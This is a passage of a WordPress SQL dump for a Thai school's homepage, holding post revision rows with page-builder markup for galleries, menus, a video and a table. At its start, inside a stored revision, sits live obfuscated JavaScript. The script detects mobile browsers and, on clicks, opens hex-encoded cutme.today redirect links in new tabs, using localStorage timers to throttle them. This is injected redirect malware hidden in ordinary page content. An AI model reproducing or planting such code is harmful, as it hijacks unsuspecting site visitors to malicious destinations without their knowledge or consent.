_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:26:01','2024-07-27 14:26:01','',19,'http://watprato.ssk.in.th/?p=74',0,'revision','',0),
(77,1,'2024-07-27 21:33:59','2024-07-27 14:33:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 